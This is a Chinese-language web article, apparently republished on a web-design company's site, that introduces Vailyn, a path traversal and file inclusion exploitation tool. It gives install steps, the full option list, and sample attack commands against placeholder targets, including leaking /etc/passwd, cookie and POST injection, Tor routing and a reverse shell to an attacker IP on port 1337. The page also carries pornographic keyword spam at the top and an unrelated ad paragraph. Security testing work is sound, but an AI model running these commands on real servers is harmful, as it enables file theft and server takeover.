日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢(xún)
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷(xiāo)解決方案
如何利用Vailyn識(shí)別路徑遍歷和文件包含漏洞

[[433744]]

關(guān)于Vailyn

Vailyn是一款多階段漏洞分析和利用工具,可以幫助廣大研究人員分析、識(shí)別和利用路徑遍歷漏洞以及文件包含漏洞。該工具的性能非常強(qiáng),并且害實(shí)現(xiàn)了大量的過(guò)濾規(guī)避技術(shù)。

創(chuàng)新互聯(lián)專(zhuān)注于山陽(yáng)網(wǎng)站建設(shè)服務(wù)及定制,我們擁有豐富的企業(yè)做網(wǎng)站經(jīng)驗(yàn)。 熱誠(chéng)為您提供山陽(yáng)營(yíng)銷(xiāo)型網(wǎng)站建設(shè),山陽(yáng)網(wǎng)站制作、山陽(yáng)網(wǎng)頁(yè)設(shè)計(jì)、山陽(yáng)網(wǎng)站官網(wǎng)定制、微信小程序開(kāi)發(fā)服務(wù),打造山陽(yáng)網(wǎng)絡(luò)公司原創(chuàng)品牌,更為您提供山陽(yáng)網(wǎng)站排名全網(wǎng)營(yíng)銷(xiāo)落地服務(wù)。

Vailyn的操作分為兩個(gè)階段。首先,它可以嘗試訪問(wèn)/etc/passwd或用戶指定的文件來(lái)檢測(cè)漏洞是否存在。此時(shí),我們可以自由選擇使用哪些Payload,而第二階段該工具將會(huì)使用我們所選擇的Payload。

第二階段是漏洞利用階段。現(xiàn)在,該工具將會(huì)嘗試使用文件和目錄字典從目標(biāo)服務(wù)器提取所有可能的文件。搜索深度和目錄排列級(jí)別可以通過(guò)參數(shù)進(jìn)行調(diào)整?;蛘撸梢韵螺d找到的文件,并將它們保存在其loot文件夾中。除此之外,Vailyn還會(huì)嘗試在目標(biāo)系統(tǒng)上獲取一個(gè)反向Shell,并允許攻擊者獲得對(duì)目標(biāo)服務(wù)器的完全控制。

當(dāng)前版本的Vailyn支持多種攻擊向量:通過(guò)查詢(xún)實(shí)現(xiàn)注入、路徑、Cookie和POST數(shù)據(jù)等。

工具安裝

我們建議的Vailyn運(yùn)行環(huán)境為Python 3.7+,但理論上來(lái)說(shuō)該工具應(yīng)當(dāng)適用于Python 3.5或Python 3.6環(huán)境。

如需安裝Vailyn,可以直接訪問(wèn)該項(xiàng)目的【Releases頁(yè)面】下載工具文檔,或使用下列命令將該項(xiàng)目源碼克隆至本地:

 
 
    
  
  
  1. $ git clone https://github.com/VainlyStrain/Vailyn 
    2.

下載好項(xiàng)目源碼之后,我們則需要安裝好該工具所需的Python依賴(lài)組件。

(1) Unix系統(tǒng)

在Unix系統(tǒng)上,可以直接運(yùn)行下列命令:

 
 
    
  
  
  1. $ pip install -r requirements.txt   # --user 
    2.

(2) Windows系統(tǒng)

在Windows系統(tǒng)上,可以直接使用pip命令來(lái)安裝“Vailyn\·?\requirements-windows.txt”中列出的依賴(lài)組件。

(3) 最后一步

如果你想要使用反向Shell模塊的完整功能,我們還需要安裝sshpass、ncat和konsole。

接下來(lái),我們就可以直接運(yùn)行下列命令來(lái)使用Vailyn了:

 
 
    
  
  
  1. $ python Vailyn -h 
    2.

工具使用

Vailyn提供了三個(gè)必要參數(shù):-v VIC, -a INT和-p2 TP P1 P2。如果使用了-a參數(shù)的話,則可以支持更多選項(xiàng)。

 
 
    
  
  
  1. ,                \                  /               , 
    2. 
  
  
  2.  
    3. 
  
  
  3.      ':.             \.      /\.     ./            .:' 
    4. 
  
  
  4.  
    5. 
  
  
  5.         ':;.          :\ .,:/   ''. /;        ..::' 
    6. 
  
  
  6.  
    7. 
  
  
  7.            ',':.,.__.'' '          ' `:.__:''.:' 
    8. 
  
  
  8.  
    9. 
  
  
  9.               ';..                        ,;'     * 
    10. 
  
  
  10.  
    11. 
  
  
  11.        *         '.,                   .:' 
    12. 
  
  
  12.  
    13. 
  
  
  13.                     `v;.            ;v'        o 
    14. 
  
  
  14.  
    15. 
  
  
  15.               .      '  '..      :.' '     . 
    16. 
  
  
  16.  
    17. 
  
  
  17.                      '     ':;, '    ' 
    18. 
  
  
  18.  
    19. 
  
  
  19.             o                '          .   :         
    20. 
  
  
  20.  
    21. 
  
  
  21.                                            * 
    22. 
  
  
  22.                          | Vailyn | 
    23. 
  
  
  23.  
    24. 
  
  
  24.                       [ VainlyStrain ]     
    25. 
  
  
  25. Vsynta Vailyn -v VIC -a INT -p2 TP P1 P2 
    26. 
  
  
  26.  
    27. 
  
  
  27.         [-p PAM] [-i F] [-Pi VIC2] 
    28. 
  
  
  28.  
    29. 
  
  
  29.       [-c C] [-n] [-d I J K] 
    30. 
  
  
  30.  
    31. 
  
  
  31.        [-s T] [-t] [-L] 
    32. 
  
  
  32.  
    33. 
  
  
  33.   [-l] [-P] [-A]  
    34. 
  
  
  34.  
    35. 
  
  
  35. mandatory: 
    36. 
  
  
  36.  
    37. 
  
  
  37.   -v VIC, --victim VIC  Target to attack, part 1 [pre-payload] 
    38. 
  
  
  38.  
    39. 
  
  
  39.   -a INT, --attack INT  Attack type (int, 1-5, or A) 
    40. 
  
  
  40.  
    41. 
  
  
  41.     A|  Spider (all)       2|  Path               5|  POST Data, json 
    42. 
  
  
  42.  
    43. 
  
  
  43.     P|  Spider (partial)   3|  Cookie 
    44. 
  
  
  44.  
    45. 
  
  
  45.     1|  Query Parameter    4|  POST Data, plain 
    46. 
  
  
  46.  
    47. 
  
  
  47.   -p2 TP P1 P2, --phase2 TP P1 P2 
    48. 
  
  
  48.  
    49. 
  
  
  49.                         Attack in Phase 2, and needed parameters 
    50. 
  
  
  50.   
    51. 
  
  
  51. ┌[ Values ]─────────────┬────────────────────┐ 
    52. 
  
  
  52.  
    53. 
  
  
  53. │ TP      │ P1          │ P2                 │ 
    54. 
  
  
  54.  
    55. 
  
  
  55. ├─────────┼─────────────┼────────────────────┤ 
    56. 
  
  
  56.  
    57. 
  
  
  57. │ leak    │ File Dict   │ Directory Dict     │ 
    58. 
  
  
  58.  
    59. 
  
  
  59. │ inject  │ IP Addr     │ Listening Port     │ 
    60. 
  
  
  60.  
    61. 
  
  
  61. │ implant │ Source File │ Server Destination │ 
    62. 
  
  
  62.  
    63. 
  
  
  63. └─────────┴─────────────┴────────────────────┘ 
    64. 
  
  
  64.  
    65. 
  
  
  65.   
    66. 
  
  
  66.  
    67. 
  
  
  67. additional: 
    68. 
  
  
  68.  
    69. 
  
  
  69.   -p PAM, --param PAM   query parameter or POST data for --attack 1, 4, 5 
    70. 
  
  
  70.  
    71. 
  
  
  71.   -i F, --check F       File to check for in Phase 1 (df: etc/passwd) 
    72. 
  
  
  72.  
    73. 
  
  
  73.   -Pi VIC2, --vic2 VIC2 Attack Target, part 2 [post-payload] 
    74. 
  
  
  74.  
    75. 
  
  
  75.   -c C, --cookie C      Cookie to append (in header format) 
    76. 
  
  
  76.  
    77. 
  
  
  77.   -l, --loot            Download found files into the loot folder 
    78. 
  
  
  78.  
    79. 
  
  
  79.   -d I J K, --depths I J K 
    80. 
  
  
  80.  
    81. 
  
  
  81.                         depths (I: phase 1, J: phase 2, K: permutation level) 
    82. 
  
  
  82.  
    83. 
  
  
  83.   -h, --help            show this help menu and exit 
    84. 
  
  
  84.  
    85. 
  
  
  85.   -s T, --timeout T     Request Timeout; stable switch for Arjun 
    86. 
  
  
  86.  
    87. 
  
  
  87.   -t, --tor             Pipe attacks through the Tor anonymity network 
    88. 
  
  
  88.  
    89. 
  
  
  89.   -L, --lfi             Additionally use PHP wrappers to leak files 
    90. 
  
  
  90.  
    91. 
  
  
  91.   -n, --nosploit        skip Phase 2 (does not need -p2 TP P1 P2) 
    92. 
  
  
  92.  
    93. 
  
  
  93.   -P, --precise         Use exact depth in Phase 1 (not a range) 
    94. 
  
  
  94.  
    95. 
  
  
  95.   -A, --app             Start Vailyn's Qt5 interface 
    96. 
  
  
  96.  
    97. 
  
  
  97.   
    98. 
  
  
  98.  
    99. 
  
  
  99. develop: 
    100. 
  
  
  100.  
    101. 
  
  
  101.   --debug               Display every path tried, even 404s. 
    102. 
  
  
  102.  
    103. 
  
  
  103.   --version             Print program version and exit. 
    104. 
  
  
  104.  
    105. 
  
  
  105.   --notmain             Avoid notify2 crash in subprocess call.  
    106. 
  
  
  106.  
    107. 
  
  
  107. Info: 
    108. 
  
  
  108.  
    109. 
  
  
  109.   to leak files using absolute paths: -d 0 0 0 
    110. 
  
  
  110.  
    111. 
  
  
  111.   to get a shell using absolute paths: -d 0 X 0 
    112.

Vailyn當(dāng)前支持五種攻擊向量,并且提供了自動(dòng)化爬蟲(chóng)。我們可以通過(guò)-a INT參數(shù)來(lái)選擇需要執(zhí)行的攻擊:

 
 
    
  
  
  1. INT        attack 
    2. 
  
  
  2.  
    3. 
  
  
  3. ----       ------- 
    4. 
  
  
  4.  
    5. 
  
  
  5. 1          query-based attack  (https://site.com?file=../../../) 
    6. 
  
  
  6.  
    7. 
  
  
  7. 2          path-based attack   (https://site.com/../../../) 
    8. 
  
  
  8.  
    9. 
  
  
  9. 3          cookie-based attack (will grab the cookies for you) 
    10. 
  
  
  10.  
    11. 
  
  
  11. 4          plain post data     (ELEM1=VAL1&ELEM2=../../../) 
    12. 
  
  
  12.  
    13. 
  
  
  13. 5          json post data      ({"file": "../../../"}) 
    14. 
  
  
  14.  
    15. 
  
  
  15. A          spider              fetch + analyze all URLs from site using all vectors 
    16. 
  
  
  16.  
    17. 
  
  
  17. P          partial spider      fetch + analyze all URLs from site using only selected vectors 
    18.

工具使用演示

簡(jiǎn)單的查詢(xún)攻擊,第二階段文件提取:

 
 
    
  
  
  1. $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file --> http://site.com/download.php?file=../INJECT 
    2.

簡(jiǎn)單的查詢(xún),但知道file.php已存在:

 
 
    
  
  
  1. $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file -i file.php -d 2 X X -P 
    2.

簡(jiǎn)單的路徑攻擊:

 
 
    
  
  
  1. $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs --> http://site.com/../INJECT 
    2.

路徑攻擊,但需要查詢(xún)參數(shù)和標(biāo)簽:

 
 
    
  
  
  1. $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs -Pi "?token=X#title" --> http://site.com/../INJECT?token=X#title 
    2.

簡(jiǎn)單的Cookie攻擊:

 
 
    
  
  
  1. $ Vailyn -v "http://site.com/cookiemonster.php" -a 3 -p2 leak dicts/files dicts/dirs 
    2.

POST Plain攻擊:

 
 
    
  
  
  1. $ Vailyn -v "http://site.com/download.php" -a 4 -p2 leak dicts/files dicts/dirs -p "DATA1=xx&DATA2=INJECT" 
    2.

POST JSON攻擊:

 
 
    
  
  
  1. $ Vailyn -v "http://site.com/download.php" -a 5 -p2 leak dicts/files dicts/dirs -p '{"file": "INJECT"}' 
    2.

攻擊,但目標(biāo)存在登錄界面:

 
 
    
  
  
  1. $ Vailyn -v "http://site.com/" -a 1 -p2 leak dicts/files dicts/dirs -c "sessionid=foobar" 
    2.

攻擊,但需要一個(gè)反向Shell(端口1337):

 
 
    
  
  
  1. $ Vailyn -v "http://site.com/download.php" -a 1 -p2 inject MY.IP.IS.XX 1337 # a high Phase 2 Depth is needed for log injection 
    2.

完全的爬蟲(chóng)自動(dòng)化模式:

 
 
    
  
  
  1. $ Vailyn -v "http://root-url.site" -a A 
    2.

工具演示視頻

視頻地址:【點(diǎn)我觀看】

項(xiàng)目地址

Vailyn:【GitHub傳送門(mén)】


網(wǎng)站標(biāo)題:如何利用Vailyn識(shí)別路徑遍歷和文件包含漏洞
網(wǎng)頁(yè)地址:http://www.dlmjj.cn/article/ccidojc.html